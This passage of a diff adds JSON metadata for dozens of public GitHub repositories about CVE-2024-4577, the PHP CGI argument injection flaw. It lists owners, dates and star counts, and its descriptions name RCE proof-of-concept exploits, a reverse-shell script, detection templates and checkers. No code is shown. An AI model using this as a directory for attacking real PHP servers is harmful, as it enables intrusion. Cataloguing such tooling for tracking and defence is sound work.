+ "description": "PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC",
+ "fork": false,
+ "created_at": "2024-06-07T09:52:54Z",
+ "updated_at": "2024-06-26T05:34:36Z",
+ "pushed_at": "2024-06-22T15:13:52Z",
+ "stargazers_count": 150,
+ "watchers_count": 150,
+ "has_discussions": false,
+ "forks_count": 37,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 37,
+ "watchers": 150,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 811787647,
+ "name": "CVE-2024-4577",
+ "full_name": "zjhzjhhh\/CVE-2024-4577",
+ "owner": {
+ "login": "zjhzjhhh",
+ "id": 64487620,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64487620?v=4",
+ "html_url": "https:\/\/github.com\/zjhzjhhh"
+ },
+ "html_url": "https:\/\/github.com\/zjhzjhhh\/CVE-2024-4577",
+ "description": "CVE-2024-4577",
+ "fork": false,
+ "created_at": "2024-06-07T09:53:32Z",
+ "updated_at": "2024-06-07T09:53:32Z",
+ "pushed_at": "2024-06-07T09:53:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811805923,
+ "name": "CVE-2024-4577-Nuclei-Template",
+ "full_name": "huseyinstif\/CVE-2024-4577-Nuclei-Template",
+ "owner": {
+ "login": "huseyinstif",
+ "id": 54823077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4",
+ "html_url": "https:\/\/github.com\/huseyinstif"
+ },
+ "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-4577-Nuclei-Template",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-07T10:40:37Z",
+ "updated_at": "2024-06-24T11:55:01Z",
+ "pushed_at": "2024-06-24T11:54:58Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811813168,
+ "name": "CVE-2024-4577",
+ "full_name": "taida957789\/CVE-2024-4577",
+ "owner": {
+ "login": "taida957789",
+ "id": 3710930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710930?v=4",
+ "html_url": "https:\/\/github.com\/taida957789"
+ },
+ "html_url": "https:\/\/github.com\/taida957789\/CVE-2024-4577",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-07T10:58:57Z",
+ "updated_at": "2024-06-17T19:38:41Z",
+ "pushed_at": "2024-06-07T11:05:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811856232,
+ "name": "CVE-2024-4577",
+ "full_name": "Wh02m1\/CVE-2024-4577",
+ "owner": {
+ "login": "Wh02m1",
+ "id": 21974999,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21974999?v=4",
+ "html_url": "https:\/\/github.com\/Wh02m1"
+ },
+ "html_url": "https:\/\/github.com\/Wh02m1\/CVE-2024-4577",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-07T12:49:20Z",
+ "updated_at": "2024-06-09T12:50:40Z",
+ "pushed_at": "2024-06-07T14:29:09Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811966277,
+ "name": "CVE-2024-4577",
+ "full_name": "Sysc4ll3r\/CVE-2024-4577",
+ "owner": {
+ "login": "Sysc4ll3r",
+ "id": 158176899,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158176899?v=4",
+ "html_url": "https:\/\/github.com\/Sysc4ll3r"
+ },
+ "html_url": "https:\/\/github.com\/Sysc4ll3r\/CVE-2024-4577",
+ "description": "Nuclei Template for CVE-2024-4577",
+ "fork": false,
+ "created_at": "2024-06-07T17:01:20Z",
+ "updated_at": "2024-06-07T18:41:20Z",
+ "pushed_at": "2024-06-07T18:41:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811966807,
+ "name": "CVE-2024-4577-RCE-EXP",
+ "full_name": "WanLiChangChengWanLiChang\/CVE-2024-4577-RCE-EXP",
+ "owner": {
+ "login": "WanLiChangChengWanLiChang",
+ "id": 171075497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4",
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang"
+ },
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-4577-RCE-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-07T17:02:52Z",
+ "updated_at": "2024-06-07T17:26:21Z",
+ "pushed_at": "2024-06-07T17:26:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812032307,
+ "name": "CVE-2024-4577",
+ "full_name": "Yukiioz\/CVE-2024-4577",
+ "owner": {
+ "login": "Yukiioz",
+ "id": 26349077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26349077?v=4",
+ "html_url": "https:\/\/github.com\/Yukiioz"
+ },
+ "html_url": "https:\/\/github.com\/Yukiioz\/CVE-2024-4577",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-07T20:10:49Z",
+ "updated_at": "2024-06-07T20:35:09Z",
+ "pushed_at": "2024-06-07T20:35:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812126791,
+ "name": "CVE-2024-4577-nuclei",
+ "full_name": "0x20c\/CVE-2024-4577-nuclei",
+ "owner": {
+ "login": "0x20c",
+ "id": 25526653,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4",
+ "html_url": "https:\/\/github.com\/0x20c"
+ },
+ "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-4577-nuclei",
+ "description": "CVE-2024-4577 nuclei-templates",
+ "fork": false,
+ "created_at": "2024-06-08T03:12:28Z",
+ "updated_at": "2024-06-10T02:18:29Z",
+ "pushed_at": "2024-06-08T04:14:28Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812155900,
+ "name": "CVE-2024-4577",
+ "full_name": "manuelinfosec\/CVE-2024-4577",
+ "owner": {
+ "login": "manuelinfosec",
+ "id": 47338716,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47338716?v=4",
+ "html_url": "https:\/\/github.com\/manuelinfosec"
+ },
+ "html_url": "https:\/\/github.com\/manuelinfosec\/CVE-2024-4577",
+ "description": "Proof Of Concept RCE exploit for critical vulnerability in PHP <8.2.15 (Windows), allowing attackers to execute arbitrary commands.",
+ "fork": false,
+ "created_at": "2024-06-08T05:27:44Z",
+ "updated_at": "2024-06-09T16:48:20Z",
+ "pushed_at": "2024-06-08T05:50:27Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812174425,
+ "name": "CVE-2024-4577",
+ "full_name": "zomasec\/CVE-2024-4577",
+ "owner": {
+ "login": "zomasec",
+ "id": 118324667,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118324667?v=4",
+ "html_url": "https:\/\/github.com\/zomasec"
+ },
+ "html_url": "https:\/\/github.com\/zomasec\/CVE-2024-4577",
+ "description": "CVE-2024-4577 Exploit POC ",
+ "fork": false,
+ "created_at": "2024-06-08T06:36:14Z",
+ "updated_at": "2024-06-09T10:50:42Z",
+ "pushed_at": "2024-06-09T16:47:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812271703,
+ "name": "CVE-2024-4577-PHP-RCE",
+ "full_name": "ZephrFish\/CVE-2024-4577-PHP-RCE",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2024-4577-PHP-RCE",
+ "description": "PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template",
+ "fork": false,
+ "created_at": "2024-06-08T12:23:35Z",
+ "updated_at": "2024-06-25T07:30:32Z",
+ "pushed_at": "2024-06-19T16:19:57Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-4577",
+ "pentest",
+ "php",
+ "poc",
+ "rce-exploit",
+ "redteam"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812283983,
+ "name": "CVE-2024-4577-PHP-RCE",
+ "full_name": "xcanwin\/CVE-2024-4577-PHP-RCE",
+ "owner": {
+ "login": "xcanwin",
+ "id": 14187349,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4",
+ "html_url": "https:\/\/github.com\/xcanwin"
+ },
+ "html_url": "https:\/\/github.com\/xcanwin\/CVE-2024-4577-PHP-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-08T13:04:45Z",
+ "updated_at": "2024-06-13T02:40:41Z",
+ "pushed_at": "2024-06-11T17:13:21Z",
+ "stargazers_count": 99,
+ "watchers_count": 99,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 99,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812648512,
+ "name": "CVE-2024-4577",
+ "full_name": "dbyMelina\/CVE-2024-4577",
+ "owner": {
+ "login": "dbyMelina",
+ "id": 93864453,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93864453?v=4",
+ "html_url": "https:\/\/github.com\/dbyMelina"
+ },
+ "html_url": "https:\/\/github.com\/dbyMelina\/CVE-2024-4577",
+ "description": "python poc编写练手,可以对单个目标或批量检测",
+ "fork": false,
+ "created_at": "2024-06-09T13:46:46Z",
+ "updated_at": "2024-06-09T13:48:02Z",
+ "pushed_at": "2024-06-09T13:47:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812658588,
+ "name": "CVE-2024-4577",
+ "full_name": "Chocapikk\/CVE-2024-4577",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-4577",
+ "description": "PHP CGI Argument Injection vulnerability",
+ "fork": false,
+ "created_at": "2024-06-09T14:18:21Z",
+ "updated_at": "2024-06-26T03:15:00Z",
+ "pushed_at": "2024-06-09T14:20:36Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812806796,
+ "name": "CVE-2024-4577-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2024-4577-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-4577-EXPLOIT",
+ "description": "A PoC exploit for CVE-2024-4577 - PHP CGI Argument Injection Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2024-06-09T23:32:11Z",
+ "updated_at": "2024-06-11T10:17:20Z",
+ "pushed_at": "2024-06-10T11:12:44Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "argument",
+ "code-injection",
+ "cve-2024-4577",
+ "exploit",
+ "php",
+ "php-cgi",
+ "poc",
+ "proof-of-concept",
+ "rce",
+ "rce-exploit",
+ "rce-scanner",
+ "remote-code-execution",
+ "xamp"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812935003,
+ "name": "check_cve_2024_4577.sh",
+ "full_name": "it-t4mpan\/check_cve_2024_4577.sh",
+ "owner": {
+ "login": "it-t4mpan",
+ "id": 168879273,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168879273?v=4",
+ "html_url": "https:\/\/github.com\/it-t4mpan"
+ },
+ "html_url": "https:\/\/github.com\/it-t4mpan\/check_cve_2024_4577.sh",
+ "description": "Bash script that checks if a PHP CGI setup is vulnerable to the CVE-2024-4577 argument injection vulnerability",
+ "fork": false,
+ "created_at": "2024-06-10T07:28:44Z",
+ "updated_at": "2024-06-10T07:34:27Z",
+ "pushed_at": "2024-06-10T07:34:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 813698508,
+ "name": "CVE-2024-4577",
+ "full_name": "bl4cksku11\/CVE-2024-4577",
+ "owner": {
+ "login": "bl4cksku11",
+ "id": 81886705,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81886705?v=4",
+ "html_url": "https:\/\/github.com\/bl4cksku11"
+ },
+ "html_url": "https:\/\/github.com\/bl4cksku11\/CVE-2024-4577",
+ "description": "This is a PoC for PHP CVE-2024-4577.",
+ "fork": false,
+ "created_at": "2024-06-11T15:11:56Z",
+ "updated_at": "2024-06-11T15:29:25Z",
+ "pushed_at": "2024-06-11T15:29:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 813923060,
+ "name": "CVE-2024-4577",
+ "full_name": "nemu1k5ma\/CVE-2024-4577",
+ "owner": {
+ "login": "nemu1k5ma",
+ "id": 46486428,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46486428?v=4",
+ "html_url": "https:\/\/github.com\/nemu1k5ma"
+ },
+ "html_url": "https:\/\/github.com\/nemu1k5ma\/CVE-2024-4577",
+ "description": "php-cgi RCE快速检测",
+ "fork": false,
+ "created_at": "2024-06-12T02:16:09Z",
+ "updated_at": "2024-06-13T01:15:50Z",
+ "pushed_at": "2024-06-13T01:15:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 813963749,
+ "name": "CVE-2024-4577-POC",
+ "full_name": "aaddmin1122345\/CVE-2024-4577-POC",
+ "owner": {
+ "login": "aaddmin1122345",
+ "id": 45313133,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45313133?v=4",
+ "html_url": "https:\/\/github.com\/aaddmin1122345"
+ },
+ "html_url": "https:\/\/github.com\/aaddmin1122345\/CVE-2024-4577-POC",
+ "description": "CVE-2024-4577",
+ "fork": false,
+ "created_at": "2024-06-12T04:50:25Z",
+ "updated_at": "2024-06-13T19:21:47Z",
+ "pushed_at": "2024-06-12T10:30:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814002252,
+ "name": "Shodan-CVE-2024-4577",
+ "full_name": "d3ck4\/Shodan-CVE-2024-4577",
+ "owner": {
+ "login": "d3ck4",
+ "id": 6336324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6336324?v=4",
+ "html_url": "https:\/\/github.com\/d3ck4"
+ },
+ "html_url": "https:\/\/github.com\/d3ck4\/Shodan-CVE-2024-4577",
+ "description": "POC for CVE-2024-4577 with Shodan integration",
+ "fork": false,
+ "created_at": "2024-06-12T06:45:08Z",
+ "updated_at": "2024-06-12T07:02:39Z",
+ "pushed_at": "2024-06-12T07:02:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814021668,
+ "name": "CVE-2024-4577_Analysis",
+ "full_name": "Entropt\/CVE-2024-4577_Analysis",
+ "owner": {
+ "login": "Entropt",
+ "id": 104687644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104687644?v=4",
+ "html_url": "https:\/\/github.com\/Entropt"
+ },
+ "html_url": "https:\/\/github.com\/Entropt\/CVE-2024-4577_Analysis",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-12T07:33:41Z",
+ "updated_at": "2024-06-18T18:00:03Z",
+ "pushed_at": "2024-06-18T18:00:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814127553,
+ "name": "CVE-2024-4577-PHP-CGI-RCE",
+ "full_name": "XiangDongCJC\/CVE-2024-4577-PHP-CGI-RCE",
+ "owner": {
+ "login": "XiangDongCJC",
+ "id": 125707007,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125707007?v=4",
+ "html_url": "https:\/\/github.com\/XiangDongCJC"
+ },
+ "html_url": "https:\/\/github.com\/XiangDongCJC\/CVE-2024-4577-PHP-CGI-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-12T11:50:01Z",
+ "updated_at": "2024-06-12T14:54:31Z",
+ "pushed_at": "2024-06-12T12:50:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814626066,
+ "name": "cve-2024-4577",
+ "full_name": "hexedbyte\/cve-2024-4577",
+ "owner": {
+ "login": "hexedbyte",
+ "id": 133281263,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133281263?v=4",
+ "html_url": "https:\/\/github.com\/hexedbyte"
+ },
+ "html_url": "https:\/\/github.com\/hexedbyte\/cve-2024-4577",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-13T11:28:33Z",
+ "updated_at": "2024-06-13T12:43:06Z",
+ "pushed_at": "2024-06-13T12:43:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814702003,
+ "name": "CVE-2024-4577",
+ "full_name": "Sh0ckFR\/CVE-2024-4577",
+ "owner": {
+ "login": "Sh0ckFR",
+ "id": 10033649,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10033649?v=4",
+ "html_url": "https:\/\/github.com\/Sh0ckFR"
+ },
+ "html_url": "https:\/\/github.com\/Sh0ckFR\/CVE-2024-4577",
+ "description": "Fixed and minimalist PoC of the CVE-2024-4577",
+ "fork": false,
+ "created_at": "2024-06-13T14:25:04Z",
+ "updated_at": "2024-06-14T07:17:28Z",
+ "pushed_at": "2024-06-13T15:17:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815387127,
+ "name": "CVE-2024-4577",
+ "full_name": "gotr00t0day\/CVE-2024-4577",
+ "owner": {
+ "login": "gotr00t0day",
+ "id": 48636787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4",
+ "html_url": "https:\/\/github.com\/gotr00t0day"
+ },
+ "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-4577",
+ "description": "Argument injection vulnerability in PHP",
+ "fork": false,
+ "created_at": "2024-06-15T02:49:37Z",
+ "updated_at": "2024-06-17T19:33:21Z",
+ "pushed_at": "2024-06-15T02:57:48Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815648681,
+ "name": "CVE-2024-4577",
+ "full_name": "sug4r-wr41th\/CVE-2024-4577",
+ "owner": {
+ "login": "sug4r-wr41th",
+ "id": 136193030,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136193030?v=4",
+ "html_url": "https:\/\/github.com\/sug4r-wr41th"
+ },
+ "html_url": "https:\/\/github.com\/sug4r-wr41th\/CVE-2024-4577",
+ "description": "PHP CGI Remote Code Execution (CVE-2024-4577) PoC",
+ "fork": false,
+ "created_at": "2024-06-15T18:05:31Z",
+ "updated_at": "2024-06-18T10:53:00Z",
+ "pushed_at": "2024-06-15T18:12:19Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815692217,
+ "name": "CVE-2024-4577",
+ "full_name": "AlperenY-cs\/CVE-2024-4577",
+ "owner": {
+ "login": "AlperenY-cs",
+ "id": 45148606,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45148606?v=4",
+ "html_url": "https:\/\/github.com\/AlperenY-cs"
+ },
+ "html_url": "https:\/\/github.com\/AlperenY-cs\/CVE-2024-4577",
+ "description": "Python script for get reverse shell with using CVE-2024-4577",
+ "fork": false,
+ "created_at": "2024-06-15T21:16:49Z",
+ "updated_at": "2024-06-15T21:16:52Z",
+ "pushed_at": "2024-06-15T21:16:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 816417208,
+ "name": "CVE-2024-4577",
+ "full_name": "VictorShem\/CVE-2024-4577",
+ "owner": {
+ "login": "VictorShem",
+ "id": 106722243,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106722243?v=4",
+ "html_url": "https:\/\/github.com\/VictorShem"
+ },
+ "html_url": "https:\/\/github.com\/VictorShem\/CVE-2024-4577",
+ "description": "CVE-2024-4577 POC",
+ "fork": false,
+ "created_at": "2024-06-17T17:53:31Z",
+ "updated_at": "2024-06-23T10:59:38Z",
+ "pushed_at": "2024-06-17T17:59:17Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 816822296,
+ "name": "CVE-2024-4577-PHP-CGI-argument-injection-RCE",
+ "full_name": "jakabakos\/CVE-2024-4577-PHP-CGI-argument-injection-RCE",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-4577-PHP-CGI-argument-injection-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-18T13:19:21Z",
+ "updated_at": "2024-06-24T10:32:31Z",
+ "pushed_at": "2024-06-18T13:54:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817084025,
+ "name": "CVE-2024-4577",
+ "full_name": "amandineVdw\/CVE-2024-4577",
+ "owner": {
+ "login": "amandineVdw",
+ "id": 164058998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164058998?v=4",
+ "html_url": "https:\/\/github.com\/amandineVdw"
+ },
+ "html_url": "https:\/\/github.com\/amandineVdw\/CVE-2024-4577",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-19T01:50:40Z",
+ "updated_at": "2024-06-19T01:52:58Z",
+ "pushed_at": "2024-06-19T01:52:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 819357672,
+ "name": "CVE-2024-4577-Defend",
+ "full_name": "PhinehasNarh\/CVE-2024-4577-Defend",
+ "owner": {
+ "login": "PhinehasNarh",
+ "id": 137224635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137224635?v=4",
+ "html_url": "https:\/\/github.com\/PhinehasNarh"
